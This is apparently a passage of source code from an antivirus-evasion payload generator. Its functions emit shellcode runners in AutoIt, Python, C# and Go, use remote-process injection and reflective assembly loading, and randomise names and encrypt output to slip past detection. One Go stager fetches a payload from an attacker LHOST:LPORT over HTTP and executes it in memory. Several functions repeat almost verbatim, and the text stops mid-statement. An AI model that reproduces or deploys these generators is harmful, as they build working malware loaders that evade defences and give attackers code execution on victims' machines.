def generate(self):
# Generate the shellcode
if not self.cli_shellcode:
Shellcode = self.shellcode.generate(self.cli_opts)
if self.shellcode.msfvenompayload:
self.payload_type = self.shellcode.msfvenompayload
elif self.shellcode.payload_choice:
self.payload_type = self.shellcode.payload_choice
self.shellcode.payload_choice = ''
# assume custom shellcode
else:
self.payload_type = 'custom'
else:
Shellcode = self.cli_shellcode
# get it in AutoITs format
Shellcode = "0x" + "".join(Shellcode.split("\\x"))
total_size = len(Shellcode)
RandFuncName = evasion_helpers.randomString()
RandArgName = evasion_helpers.randomString()
RandASMVarName = evasion_helpers.randomString()
RandASMBufferName = evasion_helpers.randomString()
RandBinBufferName = evasion_helpers.randomString()
length_limit = 4000
# keep that pesky tray icon from appearing
payload_code = "#NoTrayIcon\n"
payload_code += RandFuncName + '(fileread("%WinDir%\\system32\\calc.exe"))\n'
payload_code += 'Func ' + RandFuncName + '($' + RandArgName + ')\n'
if total_size > length_limit:
all_lines = [
Shellcode[i:i + length_limit]
for i in range(0, len(Shellcode), length_limit)
]
first_run = True
for line in all_lines:
if first_run:
payload_code += '\tLocal $' + RandASMVarName + '="' + line + '"\n'
first_run = False
else:
payload_code += '\t$' + RandASMVarName + ' = $' + RandASMVarName + ' & "' + line + '"\n'
else:
payload_code += '\tLocal $' + RandASMVarName + '="' + Shellcode + '"\n'
payload_code += '\tLocal $' + RandASMBufferName + ' = DllStructCreate("byte[" & BinaryLen($' + RandASMVarName + ') & "]")\n'
payload_code += '\tLocal $' + RandBinBufferName + ' = DllStructCreate("byte[" & BinaryLen($' + RandArgName + ') & "]")\n'
payload_code += '\tDllStructSetData($' + RandASMBufferName + ', 1, $' + RandASMVarName + ')\n'
payload_code += '\tDllStructSetData($' + RandBinBufferName + ', 1, $' + RandArgName + ')\n'
payload_code += '\tLocal $Ret = DllCall("user32.dll", "int", "CallWindowProc", "ptr", DllStructGetPtr($' + RandASMBufferName + '), "ptr", DllStructGetPtr($' + RandBinBufferName + '), "int", 0, "int", 0, "int", 0)\n'
payload_code += "EndFunc\n"
self.payload_source_code = payload_code
return
def generate(self):
# Generate the shellcode
if not self.cli_shellcode:
Shellcode = self.shellcode.generate(self.cli_opts)
if self.shellcode.msfvenompayload:
self.payload_type = self.shellcode.msfvenompayload
elif self.shellcode.payload_choice:
self.payload_type = self.shellcode.payload_choice
self.shellcode.payload_choice = ""
# assume custom shellcode
else:
self.payload_type = 'custom'
else:
Shellcode = self.cli_shellcode
# get it in AutoITs format
Shellcode = "0x" + ''.join(Shellcode.split("\\x"))
total_size = len(Shellcode)
RandFuncName = evasion_helpers.randomString()
RandArgName = evasion_helpers.randomString()
RandASMVarName = evasion_helpers.randomString()
RandASMBufferName = evasion_helpers.randomString()
RandBinBufferName = evasion_helpers.randomString()
length_limit = 4000
# keep that pesky tray icon from appearing
payload_code = "#NoTrayIcon\n"
payload_code += RandFuncName + '(fileread("%WinDir%\\system32\\calc.exe"))\n'
payload_code += 'Func ' + RandFuncName + '($' + RandArgName + ')\n'
if total_size > length_limit:
all_lines = [Shellcode[i:i+length_limit] for i in range(0, len(Shellcode), length_limit)]
first_run = True
for line in all_lines:
if first_run:
payload_code += '\tLocal $' + RandASMVarName + '="' + line + '"\n'
first_run = False
else:
payload_code += '\t$' + RandASMVarName + ' = $' + RandASMVarName + ' & "' + line + '"\n'
else:
payload_code += '\tLocal $' + RandASMVarName + '="' + Shellcode + '"\n'
payload_code += '\tLocal $' + RandASMBufferName + ' = DllStructCreate("byte[" & BinaryLen($' + RandASMVarName + ') & "]")\n'
payload_code += '\tLocal $' + RandBinBufferName + ' = DllStructCreate("byte[" & BinaryLen($' + RandArgName + ') & "]")\n'
payload_code += '\tDllStructSetData($' + RandASMBufferName + ', 1, $' + RandASMVarName + ')\n'
payload_code += '\tDllStructSetData($' + RandBinBufferName + ', 1, $' + RandArgName + ')\n'
payload_code += '\tLocal $Ret = DllCall("user32.dll", "int", "CallWindowProc", "ptr", DllStructGetPtr($' + RandASMBufferName + '), "ptr", DllStructGetPtr($' + RandBinBufferName + '), "int", 0, "int", 0, "int", 0)\n'
payload_code += "EndFunc\n"
self.payload_source_code = payload_code
return
def generate(self):
payload_code, num_tabs_required = gamemaker.senecas_games(self)
# Generate the shellcode
if not self.cli_shellcode:
Shellcode = self.shellcode.generate(self.cli_opts)
if self.shellcode.msfvenompayload:
self.payload_type = self.shellcode.msfvenompayload
elif self.shellcode.payload_choice:
self.payload_type = self.shellcode.payload_choice
self.shellcode.payload_choice = ""
# assume custom shellcode
else:
self.payload_type = 'custom'
else:
Shellcode = self.cli_shellcode
# Generate Random Variable Names
ShellcodeVariableName = evasion_helpers.randomString()
pid_num_variable = evasion_helpers.randomString()
pagerwx_variable = evasion_helpers.randomString()
processall_variable = evasion_helpers.randomString()
memcommit_variable = evasion_helpers.randomString()
shell_length_variable = evasion_helpers.randomString()
memalloc_variable = evasion_helpers.randomString()
prochandle_variable = evasion_helpers.randomString()
kernel32_variable = evasion_helpers.randomString()
# Create Payload code
payload_code += '\t' * num_tabs_required + 'from ctypes import *\n'
payload_code += '\t' * num_tabs_required + pagerwx_variable + ' = 0x40\n'
payload_code += '\t' * num_tabs_required + processall_variable + ' = 0x1F0FFF\n'
payload_code += '\t' * num_tabs_required + memcommit_variable + ' = 0x00001000\n'
payload_code += '\t' * num_tabs_required + kernel32_variable + ' = windll.kernel32\n'
payload_code += '\t' * num_tabs_required + ShellcodeVariableName + ' = b\'' + Shellcode + '\'\n'
payload_code += '\t' * num_tabs_required + pid_num_variable + ' = ' + self.required_options[
"PID_NUMBER"][0] + '\n'
payload_code += '\t' * num_tabs_required + shell_length_variable + ' = len(' + ShellcodeVariableName + ')\n'
payload_code += '\t' * num_tabs_required + prochandle_variable + ' = ' + kernel32_variable + '.OpenProcess(' + processall_variable + ', False, ' + pid_num_variable + ')\n'
payload_code += '\t' * num_tabs_required + memalloc_variable + ' = ' + kernel32_variable + '.VirtualAllocEx(' + prochandle_variable + ', 0, ' + shell_length_variable + ', ' + memcommit_variable + ', ' + pagerwx_variable + ')\n'
payload_code += '\t' * num_tabs_required + kernel32_variable + '.WriteProcessMemory(' + prochandle_variable + ', ' + memalloc_variable + ', ' + ShellcodeVariableName + ', ' + shell_length_variable + ', 0)\n'
payload_code += '\t' * num_tabs_required + kernel32_variable + '.CreateRemoteThread(' + prochandle_variable + ', None, 0, ' + memalloc_variable + ', 0, 0, 0)\n'
if self.required_options["USE_PYHERION"][0].lower() == "y":
payload_code = encryption.pyherion(payload_code)
self.payload_source_code = payload_code
return
def generate(self):
payload_code, num_tabs_required = gamemaker.senecas_games(self)
# Generate the shellcode
if not self.cli_shellcode:
Shellcode = self.shellcode.generate(self.cli_opts)
if self.shellcode.msfvenompayload:
self.payload_type = self.shellcode.msfvenompayload
elif self.shellcode.payload_choice:
self.payload_type = self.shellcode.payload_choice
self.shellcode.payload_choice = ""
# assume custom shellcode
else:
self.payload_type = 'custom'
else:
Shellcode = self.cli_shellcode
# Generate Random Variable Names
ShellcodeVariableName = evasion_helpers.randomString()
pid_num_variable = evasion_helpers.randomString()
pagerwx_variable = evasion_helpers.randomString()
processall_variable = evasion_helpers.randomString()
memcommit_variable = evasion_helpers.randomString()
shell_length_variable = evasion_helpers.randomString()
memalloc_variable = evasion_helpers.randomString()
prochandle_variable = evasion_helpers.randomString()
kernel32_variable = evasion_helpers.randomString()
# Create Payload code
payload_code += '\t' * num_tabs_required + 'from ctypes import *\n'
payload_code += '\t' * num_tabs_required + pagerwx_variable + ' = 0x40\n'
payload_code += '\t' * num_tabs_required + processall_variable + ' = 0x1F0FFF\n'
payload_code += '\t' * num_tabs_required + memcommit_variable + ' = 0x00001000\n'
payload_code += '\t' * num_tabs_required + kernel32_variable + ' = windll.kernel32\n'
payload_code += '\t' * num_tabs_required + ShellcodeVariableName + ' = b\'' + Shellcode + '\'\n'
payload_code += '\t' * num_tabs_required + pid_num_variable + ' = ' + self.required_options["PID_NUMBER"][0] +'\n'
payload_code += '\t' * num_tabs_required + shell_length_variable + ' = len(' + ShellcodeVariableName + ')\n'
payload_code += '\t' * num_tabs_required + prochandle_variable + ' = ' + kernel32_variable + '.OpenProcess(' + processall_variable + ', False, ' + pid_num_variable + ')\n'
payload_code += '\t' * num_tabs_required + memalloc_variable + ' = ' + kernel32_variable + '.VirtualAllocEx(' + prochandle_variable + ', 0, ' + shell_length_variable + ', ' + memcommit_variable + ', ' + pagerwx_variable + ')\n'
payload_code += '\t' * num_tabs_required + kernel32_variable + '.WriteProcessMemory(' + prochandle_variable + ', ' + memalloc_variable + ', ' + ShellcodeVariableName + ', ' + shell_length_variable + ', 0)\n'
payload_code += '\t' * num_tabs_required + kernel32_variable + '.CreateRemoteThread(' + prochandle_variable + ', None, 0, ' + memalloc_variable + ', 0, 0, 0)\n'
if self.required_options["USE_PYHERION"][0].lower() == "y":
payload_code = encryption.pyherion(payload_code)
self.payload_source_code = payload_code
return
def generate(self):
# Generate the shellcode
if not self.cli_shellcode:
Shellcode = self.shellcode.generate(self.cli_opts)
if self.shellcode.msfvenompayload:
self.payload_type = self.shellcode.msfvenompayload
elif self.shellcode.payload_choice:
self.payload_type = self.shellcode.payload_choice
self.shellcode.payload_choice = ''
# assume custom shellcode
else:
self.payload_type = 'custom'
else:
Shellcode = self.cli_shellcode
Shellcode = Shellcode.encode('latin-1')
Shellcode = Shellcode.decode('unicode_escape')
# Base64 Encode Shellcode
EncodedShellcode = base64.b64encode(bytes(Shellcode,
'latin-1')).decode('ascii')
# Generate Random Variable Names
ShellcodeVariableName = evasion_helpers.randomString()
rand_ptr = evasion_helpers.randomString()
rand_ht = evasion_helpers.randomString()
randctypes = evasion_helpers.randomString()
rand_virtual_protect = evasion_helpers.randomString()
num_tabs_required = 0
payload_code = ''
payload_code, num_tabs_required = gamemaker.senecas_games(self)
if self.required_options["INJECT_METHOD"][0].lower() == "virtual":
payload_code += '\t' * num_tabs_required + 'import ctypes as ' + randctypes + '\n'
payload_code += '\t' * num_tabs_required + 'import base64\n'
payload_code += '\t' * num_tabs_required + ShellcodeVariableName + ' = base64.b64decode(\"' + EncodedShellcode + '\")\n'
payload_code += '\t' * num_tabs_required + rand_ptr + ' = ' + randctypes + '.windll.kernel32.VirtualAlloc(' + randctypes + '.c_int(0),' + randctypes + '.c_int(len(' + ShellcodeVariableName + ')),' + randctypes + '.c_int(0x3000),' + randctypes + '.c_int(0x04))\n'
payload_code += '\t' * num_tabs_required + randctypes + '.windll.kernel32.RtlMoveMemory(' + randctypes + '.c_int(' + rand_ptr + '),' + ShellcodeVariableName + ',' + randctypes + '.c_int(len(' + ShellcodeVariableName + ')))\n'
payload_code += '\t' * num_tabs_required + rand_virtual_protect + ' = ' + randctypes + '.windll.kernel32.VirtualProtect(' + randctypes + '.c_int(' + rand_ptr + '),' + randctypes + '.c_int(len(' + ShellcodeVariableName + ')),' + randctypes + '.c_int(0x20),' + randctypes + '.byref(' + randctypes + '.c_uint32(0)))\n'
payload_code += '\t' * num_tabs_required + rand_ht + ' = ' + randctypes + '.windll.kernel32.CreateThread(' + randctypes + '.c_int(0),' + randctypes + '.c_int(0),' + randctypes + '.c_int(' + rand_ptr + '),' + randctypes + '.c_int(0),' + randctypes + '.c_int(0),' + randctypes + '.pointer(' + randctypes + '.c_int(0)))\n'
payload_code += '\t' * num_tabs_required + randctypes + '.windll.kernel32.WaitForSingleObject(' + randctypes + '.c_int(' + rand_ht + '),' + randctypes + '.c_int(-1))\n'
elif self.required_options["INJECT_METHOD"][0].lower() == "heap":
HeapVar = evasion_helpers.randomString()
payload_code += '\t' * num_tabs_required + 'import ctypes as ' + randctypes + '\n'
payload_code += '\t' * num_tabs_required + 'import base64\n'
payload_code += '\t' * num_tabs_required + ShellcodeVariableName + ' = base64.b64decode(\"' + EncodedShellcode + '\")\n'
payload_code += '\t' * num_tabs_required + HeapVar + ' = ' + randctypes + '.windll.kernel32.HeapCreate(' + randctypes + '.c_int(0x00040000),' + randctypes + '.c_int(len(' + ShellcodeVariableName + ') * 2),' + randctypes + '.c_int(0))\n'
payload_code += '\t' * num_tabs_required + rand_ptr + ' = ' + randctypes + '.windll.kernel32.HeapAlloc(' + randctypes + '.c_int(' + HeapVar + '),' + randctypes + '.c_int(0x00000008),' + randctypes + '.c_int(len( ' + ShellcodeVariableName + ')))\n'
payload_code += '\t' * num_tabs_required + randctypes + '.windll.kernel32.RtlMoveMemory(' + randctypes + '.c_int(' + rand_ptr + '),' + ShellcodeVariableName + ',' + randctypes + '.c_int(len(' + ShellcodeVariableName + ')))\n'
payload_code += '\t' * num_tabs_required + rand_ht + ' = ' + randctypes + '.windll.kernel32.CreateThread(' + randctypes + '.c_int(0),' + randctypes + '.c_int(0),' + randctypes + '.c_int(' + rand_ptr + '),' + randctypes + '.c_int(0),' + randctypes + '.c_int(0),' + randctypes + '.pointer(' + randctypes + '.c_int(0)))\n'
payload_code += '\t' * num_tabs_required + randctypes + '.windll.kernel32.WaitForSingleObject(' + randctypes + '.c_int(' + rand_ht + '),' + randctypes + '.c_int(-1))\n'
if self.required_options["USE_PYHERION"][0].lower() == "y":
payload_code = encryption.pyherion(payload_code)
self.payload_source_code = payload_code
return
def buildAryaLauncher(raw):
"""
Takes a raw set of bytes and builds a launcher shell to b64decode/decrypt
a string rep of the bytes, and then use reflection to invoke
the original .exe
"""
# the 'key' is a randomized alpha lookup table [a-zA-Z] used for substitution
key = ''.join(sorted(list(string.ascii_letters), key=lambda *args: random.random()))
base64payload = b64sub(raw, key)
payload_code = "using System; using System.Collections.Generic; using System.Text;"
payload_code += "using System.IO; using System.Reflection; using System.Linq;\n"
decodeFuncName = evasion_helpers.randomString()
baseStringName = evasion_helpers.randomString()
targetStringName = evasion_helpers.randomString()
dictionaryName = evasion_helpers.randomString()
# build out the letter sub decrypt function
payload_code += "namespace %s { class %s { private static string %s(string t, string k) {\n" % (evasion_helpers.randomString(), evasion_helpers.randomString(), decodeFuncName)
payload_code += "string %s = \"abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ\";\n" % (baseStringName)
payload_code += "string %s = \"\"; Dictionary<char, char> %s = new Dictionary<char, char>();\n" % (targetStringName, dictionaryName)
payload_code += "for (int i = 0; i < %s.Length; ++i){ %s.Add(k[i], %s[i]); }\n" % (baseStringName, dictionaryName,baseStringName)
payload_code += "for (int i = 0; i < t.Length; ++i){ if ((t[i] >= 'A' && t[i] <= 'Z') || (t[i] >= 'a' && t[i] <= 'z')) { %s += %s[t[i]];}\n" % (targetStringName, dictionaryName)
payload_code += "else { %s += t[i]; }} return %s; }\n" % (targetStringName, targetStringName)
base64PayloadName = evasion_helpers.randomString()
assemblyName = evasion_helpers.randomString()
# build out Main()
assemblyName = evasion_helpers.randomString()
methodInfoName = evasion_helpers.randomString()
keyName = evasion_helpers.randomString()
payload_code += "static void Main() {\n"
payload_code += "string %s = \"%s\";\n" % (base64PayloadName, base64payload)
payload_code += "string %s = \"%s\";\n" % (keyName, key)
# load up the assembly of the decoded binary
payload_code += "Assembly %s = Assembly.Load(Convert.FromBase64String(%s(%s, %s)));\n" % (assemblyName, decodeFuncName, base64PayloadName, keyName)
payload_code += "MethodInfo %s = %s.EntryPoint;\n" % (methodInfoName, assemblyName)
# use reflection to jump to its entry point
payload_code += "%s.Invoke(%s.CreateInstance(%s.Name), null);\n" % (methodInfoName, assemblyName, methodInfoName)
payload_code += "}}}\n"
return payload_code
def buildAryaLauncher(raw):
"""
Takes a raw set of bytes and builds a launcher shell to b64decode/decrypt
a string rep of the bytes, and then use reflection to invoke
the original .exe
"""
# the 'key' is a randomized alpha lookup table [a-zA-Z] used for substitution
key = ''.join(sorted(list(string.ascii_letters), key=lambda *args: random.random()))
base64payload = b64sub(raw, key)
payload_code = "using System; using System.Collections.Generic; using System.Text;"
payload_code += "using System.IO; using System.Reflection; using System.Linq;\n"
decodeFuncName = evasion_helpers.randomString()
baseStringName = evasion_helpers.randomString()
targetStringName = evasion_helpers.randomString()
dictionaryName = evasion_helpers.randomString()
# build out the letter sub decrypt function
payload_code += "namespace %s { class %s { private static string %s(string t, string k) {\n" % (evasion_helpers.randomString(), evasion_helpers.randomString(), decodeFuncName)
payload_code += "string %s = \"abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ\";\n" % (baseStringName)
payload_code += "string %s = \"\"; Dictionary<char, char> %s = new Dictionary<char, char>();\n" % (targetStringName, dictionaryName)
payload_code += "for (int i = 0; i < %s.Length; ++i){ %s.Add(k[i], %s[i]); }\n" % (baseStringName, dictionaryName,baseStringName)
payload_code += "for (int i = 0; i < t.Length; ++i){ if ((t[i] >= 'A' && t[i] <= 'Z') || (t[i] >= 'a' && t[i] <= 'z')) { %s += %s[t[i]];}\n" % (targetStringName, dictionaryName)
payload_code += "else { %s += t[i]; }} return %s; }\n" % (targetStringName, targetStringName)
base64PayloadName = evasion_helpers.randomString()
assemblyName = evasion_helpers.randomString()
# build out Main()
assemblyName = evasion_helpers.randomString()
methodInfoName = evasion_helpers.randomString()
keyName = evasion_helpers.randomString()
payload_code += "static void Main() {\n"
payload_code += "string %s = \"%s\";\n" % (base64PayloadName, base64payload)
payload_code += "string %s = \"%s\";\n" % (keyName, key)
# load up the assembly of the decoded binary
payload_code += "Assembly %s = Assembly.Load(Convert.FromBase64String(%s(%s, %s)));\n" % (assemblyName, decodeFuncName, base64PayloadName, keyName)
payload_code += "MethodInfo %s = %s.EntryPoint;\n" % (methodInfoName, assemblyName)
# use reflection to jump to its entry point
payload_code += "%s.Invoke(%s.CreateInstance(%s.Name), null);\n" % (methodInfoName, assemblyName, methodInfoName)
payload_code += "}}}\n"
return payload_code
def generate(self):
# Generate the shellcode
if not self.cli_shellcode:
Shellcode = self.shellcode.generate(self.cli_opts)
if self.shellcode.msfvenompayload:
self.payload_type = self.shellcode.msfvenompayload
elif self.shellcode.payload_choice:
self.payload_type = self.shellcode.payload_choice
self.shellcode.payload_choice = ""
# assume custom shellcode
else:
self.payload_type = 'custom'
else:
Shellcode = self.cli_shellcode
Shellcode = Shellcode.encode('latin-1')
Shellcode = Shellcode.decode('unicode_escape')
# Base64 Encode Shellcode
EncodedShellcode = base64.b64encode(bytes(Shellcode, 'latin-1')).decode('ascii')
# Generate Random Variable Names
ShellcodeVariableName = evasion_helpers.randomString()
rand_ptr = evasion_helpers.randomString()
rand_ht = evasion_helpers.randomString()
randctypes = evasion_helpers.randomString()
rand_virtual_protect = evasion_helpers.randomString()
num_tabs_required = 0
payload_code = ""
payload_code, num_tabs_required = gamemaker.senecas_games(self)
if self.required_options["INJECT_METHOD"][0].lower() == "virtual":
payload_code += '\t' * num_tabs_required + 'import ctypes as ' + randctypes + '\n'
payload_code += '\t' * num_tabs_required + 'import base64\n'
payload_code += '\t' * num_tabs_required + ShellcodeVariableName +' = base64.b64decode(\"' + EncodedShellcode + '\")\n'
payload_code += '\t' * num_tabs_required + rand_ptr + ' = ' + randctypes + '.windll.kernel32.VirtualAlloc(' + randctypes + '.c_int(0),' + randctypes + '.c_int(len('+ ShellcodeVariableName +')),' + randctypes + '.c_int(0x3000),' + randctypes + '.c_int(0x04))\n'
payload_code += '\t' * num_tabs_required + randctypes + '.windll.kernel32.RtlMoveMemory(' + randctypes + '.c_int(' + rand_ptr + '),' + ShellcodeVariableName + ',' + randctypes + '.c_int(len(' + ShellcodeVariableName + ')))\n'
payload_code += '\t' * num_tabs_required + rand_virtual_protect + ' = ' + randctypes + '.windll.kernel32.VirtualProtect(' + randctypes + '.c_int(' + rand_ptr + '),' + randctypes + '.c_int(len(' + ShellcodeVariableName + ')),' + randctypes + '.c_int(0x20),' + randctypes + '.byref(' + randctypes + '.c_uint32(0)))\n'
payload_code += '\t' * num_tabs_required + rand_ht + ' = ' + randctypes + '.windll.kernel32.CreateThread(' + randctypes + '.c_int(0),' + randctypes + '.c_int(0),' + randctypes + '.c_int(' + rand_ptr + '),' + randctypes + '.c_int(0),' + randctypes + '.c_int(0),' + randctypes + '.pointer(' + randctypes + '.c_int(0)))\n'
payload_code += '\t' * num_tabs_required + randctypes + '.windll.kernel32.WaitForSingleObject(' + randctypes + '.c_int(' + rand_ht + '),' + randctypes + '.c_int(-1))\n'
elif self.required_options["INJECT_METHOD"][0].lower() == "heap":
HeapVar = evasion_helpers.randomString()
payload_code += '\t' * num_tabs_required + 'import ctypes as ' + randctypes + '\n'
payload_code += '\t' * num_tabs_required + 'import base64\n'
payload_code += '\t' * num_tabs_required + ShellcodeVariableName +' = base64.b64decode(\"' + EncodedShellcode + '\")\n'
payload_code += '\t' * num_tabs_required + HeapVar + ' = ' + randctypes + '.windll.kernel32.HeapCreate(' + randctypes + '.c_int(0x00040000),' + randctypes + '.c_int(len(' + ShellcodeVariableName + ') * 2),' + randctypes + '.c_int(0))\n'
payload_code += '\t' * num_tabs_required + rand_ptr + ' = ' + randctypes + '.windll.kernel32.HeapAlloc(' + randctypes + '.c_int(' + HeapVar + '),' + randctypes + '.c_int(0x00000008),' + randctypes + '.c_int(len( ' + ShellcodeVariableName + ')))\n'
payload_code += '\t' * num_tabs_required + randctypes + '.windll.kernel32.RtlMoveMemory(' + randctypes + '.c_int(' + rand_ptr + '),' + ShellcodeVariableName + ',' + randctypes + '.c_int(len(' + ShellcodeVariableName + ')))\n'
payload_code += '\t' * num_tabs_required + rand_ht + ' = ' + randctypes + '.windll.kernel32.CreateThread(' + randctypes + '.c_int(0),' + randctypes + '.c_int(0),' + randctypes + '.c_int(' + rand_ptr + '),' + randctypes + '.c_int(0),' + randctypes + '.c_int(0),' + randctypes + '.pointer(' + randctypes + '.c_int(0)))\n'
payload_code += '\t' * num_tabs_required + randctypes + '.windll.kernel32.WaitForSingleObject(' + randctypes + '.c_int(' + rand_ht + '),' + randctypes + '.c_int(-1))\n'
if self.required_options["USE_PYHERION"][0].lower() == "y":
payload_code = encryption.pyherion(payload_code)
self.payload_source_code = payload_code
return
def generate(self):
memCommit = evasion_helpers.randomString()
memReserve = evasion_helpers.randomString()
pageExecRW = evasion_helpers.randomString()
kernel32 = evasion_helpers.randomString()
procVirtualAlloc = evasion_helpers.randomString()
base64Url = evasion_helpers.randomString()
size = evasion_helpers.randomString()
err = evasion_helpers.randomString()
randBase = evasion_helpers.randomString()
length = evasion_helpers.randomString()
foo = evasion_helpers.randomString()
random = evasion_helpers.randomString()
outp = evasion_helpers.randomString()
i = evasion_helpers.randomString()
randTextBase64URL = evasion_helpers.randomString()
getURI = evasion_helpers.randomString()
sumVar = evasion_helpers.randomString()
checksum8 = evasion_helpers.randomString()
uri = evasion_helpers.randomString()
value = evasion_helpers.randomString()
hostAndPort = evasion_helpers.randomString()
port = self.required_options["LPORT"][0]
host = self.required_options["LHOST"][0]
response = evasion_helpers.randomString()
uriLength = randint(5, 255)
payload = evasion_helpers.randomString()
bufferVar = evasion_helpers.randomString()
x = evasion_helpers.randomString()
heapcreatevariable = evasion_helpers.randomString()
heapallocvariable = evasion_helpers.randomString()
heapcreateout = evasion_helpers.randomString()
allocvarout = evasion_helpers.randomString()
errorvariable = evasion_helpers.randomString()
errorvariabledos = evasion_helpers.randomString()
cust_func = evasion_helpers.randomString()
# sandbox check code
sandbox_checks, num_curlys = gamemaker.senecas_games(self)
payload_code = "package main\nimport (\n\"syscall\"\n\"unsafe\"\n"
payload_code += "\"io/ioutil\"\n\"math/rand\"\n\"net/http\"\n\"time\"\n"
if self.required_options["PROCESSORS"][0].lower() != "x":
payload_code += "\"runtime\"\n"
# Add in other imports based on checks being performed
if self.required_options["USERNAME"][0].lower() != "x":
payload_code += "\"strings\"\n\"os/user\"\n"
if self.required_options["MINPROCS"][0].lower() != "x":
payload_code += "\"os\"\n"
if self.required_options["HOSTNAME"][0].lower() != "x" or self.required_options["PROCCHECK"][0].lower() != 'false':
if "strings" not in payload_code:
payload_code += "\"strings\"\n"
if self.required_options["SLEEP"][0].lower() != "x":
payload_code += "\"net\"\n\"encoding/binary\"\n"
if self.required_options["BADMACS"][0].lower() != 'false':
if "net" not in payload_code:
payload_code += "\"net\"\n"
if "strings" not in payload_code:
payload_code += "\"strings\"\n"
payload_code += ")\n"
if self.required_options["INJECT_METHOD"][0].lower() == "virtual":
payload_code += "const (\n"
payload_code += "%s = 0x1000\n" % (memCommit)
payload_code += "%s = 0x2000\n" % (memReserve)
payload_code += "%s = 0x40\n)\n" % (pageExecRW)
payload_code += "var (\n"
payload_code += "%s = \"ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789-_\"\n" %(base64Url)
if self.required_options["INJECT_METHOD"][0].lower() == "virtual":
payload_code += "%s = syscall.NewLazyDLL(\"kernel32.dll\")\n" % (kernel32)
payload_code += "%s = %s.NewProc(\"VirtualAlloc\")\n)\n" % (procVirtualAlloc, kernel32)
payload_code += "func %s(%s uintptr) (uintptr, error) {\n" % (cust_func, size)
payload_code += "%s, _, %s := %s.Call(0, %s, %s|%s, %s)\n" % (allocvarout, err, procVirtualAlloc, size, memReserve, memCommit, pageExecRW)
payload_code += "if %s == 0 {\nreturn 0, %s\n}\nreturn %s, nil\n}\n" % (allocvarout, err, allocvarout)
elif self.required_options["INJECT_METHOD"][0].lower() == "heap":
payload_code += kernel32 + " = syscall.NewLazyDLL(\"kernel32.dll\")\n"
payload_code += heapcreatevariable + " = " + kernel32 + ".NewProc(\"HeapCreate\")\n"
payload_code += heapallocvariable + " = " + kernel32 + ".NewProc(\"HeapAlloc\")\n)\n"
payload_code += "func %s(%s uintptr) (uintptr, error) {\n" % (cust_func, size)
payload_code += heapcreateout + ", _, " + errorvariabledos + " := " + heapcreatevariable + ".Call(0x00040000, " + size + ", 0)\n"
payload_code += allocvarout + ", _, " + errorvariabledos + " := " + heapallocvariable + ".Call(" + heapcreateout + ", 0x00000008, " + size + ")\n"
payload_code += "if %s == 0 {\nreturn 0, %s\n}\nreturn %s, nil\n}\n" % (allocvarout, errorvariabledos, allocvarout)
payload_code += "func %s(%s int, %s []byte) string {\n" % (randBase, length, foo)
payload_code += "%s := rand.New(rand.NewSource(time.Now().UnixNano()))\n" % (random)
payload_code += "var %s []byte\n" % (outp)
payload_code += "for %s := 0; %s < %s; %s++ {\n" % (i, i, length, i)
payload_code += "%s = append(%s, %s[%s.Intn(len(%s))])\n}\n" % (outp, outp, foo, random, foo)
payload_code += "return string(%s)\n}\n" % (outp)
payload_code += "func %s(%s int) string {\n" % (randTextBase64URL, length)
payload_code += "%s := []byte(%s)\n" % (foo, base64Url)
payload_code += "return %s(%s, %s)\n}\n" % (randBase, length, foo)
payload_code += "func %s(%s, %s int) string {\n" % (getURI, sumVar, length)
payload_code += "for {\n%s := 0\n%s := %s(%s)\n" % (checksum8, uri, randTextBase64URL, length)
payload_code += "for _, %s := range []byte(%s) {\n%s += int(%s)\n}\n" % (value, uri, checksum8, value)
payload_code += "if %s%s == %s {\nreturn \"/\" + %s\n}\n}\n}\n" % (checksum8, '%0x100', sumVar, uri)
payload_code += "func main() {\n"
# Sandbox code goes here
if sandbox_checks != '':
payload_code += sandbox_checks
payload_code += "%s := \"http://%s:%s\"\n" % (hostAndPort, host, port)
payload_code += "%s, _ := http.Get(%s + %s(92, %s))\n" % (response, hostAndPort, getURI, uriLength)
payload_code += "defer %s.Body.Close()\n" % (response)
payload_code += "%s, _ := ioutil.ReadAll(%s.Body)\n" % (payload, response)
payload_code += "%s, _ := %s(uintptr(len(%s)))\n" % (allocvarout, cust_func, payload)
payload_code += "%s := (*[990000]byte)(unsafe.Pointer(%s))\n" % (bufferVar, allocvarout)
payload_code += "for %s, %s := range %s {\n" % (x, value, payload)
payload_code += "%s[%s] = %s\n}\n" % (bufferVar, x, value)
payload_code += "syscall.Syscall(%s, 0, 0, 0, 0)\n}\n" % (allocvarout)
payload_code += '}' * num_curlys
self.payload_source_code = payload_code
return
def generate(self):
# Generate the shellcode
if not self.cli_shellcode:
Shellcode = self.shellcode.generate(self.cli_opts)
if self.shellcode.msfvenompayload:
self.payload_type = self.shellcode.msfvenompayload
elif self.shellcode.payload_choice:
self.payload_type = self.shellcode.payload_choice
self.shellcode.payload_choice = ''
# assume custom shellcode
else:
self.payload_type = 'custom'
else:
Shellcode = self.cli_shellcode
Shellcode = "0" + ",0".join(Shellcode.split("\\")[1:])
# randomize all our variable names, yo'
namespaceName = evasion_helpers.randomString()
className = evasion_helpers.randomString()
bytearrayName = evasion_helpers.randomString()
funcAddrName = evasion_helpers.randomString()
hThreadName = evasion_helpers.randomString()
threadIdName = evasion_helpers.randomString()
pinfoName = evasion_helpers.randomString()
rand_bool = evasion_helpers.randomString()
random_out = evasion_helpers.randomString()
num_tabs_required = 0
# get 12 random variables for the API imports
r = [evasion_helpers.randomString() for x in range(16)]
y = [evasion_helpers.randomString() for x in range(17)]
#required syntax at the beginning of any/all payloads
payload_code = "using System; using System.Net; using System.Net.Sockets; using System.Runtime.InteropServices; using System.Threading;\n"
payload_code += "namespace %s { class %s {\n" % (namespaceName,
className)
if self.required_options["INJECT_METHOD"][0].lower() == "virtual":
payload_code += """\t\t[DllImport(\"kernel32\")] private static extern IntPtr VirtualAlloc(UInt32 %s,UInt32 %s, UInt32 %s, UInt32 %s);\n[DllImport(\"kernel32\")] public static extern bool VirtualProtect(IntPtr %s, uint %s, uint %s, out uint %s);\n[DllImport(\"kernel32\")]private static extern IntPtr CreateThread(UInt32 %s, UInt32 %s, IntPtr %s,IntPtr %s, UInt32 %s, ref UInt32 %s);\n[DllImport(\"kernel32\")] private static extern UInt32 WaitForSingleObject(IntPtr %s, UInt32 %s);\n""" % (
r[0], r[1], r[2], r[3], r[4], r[5], r[6], r[7], r[8], r[9],
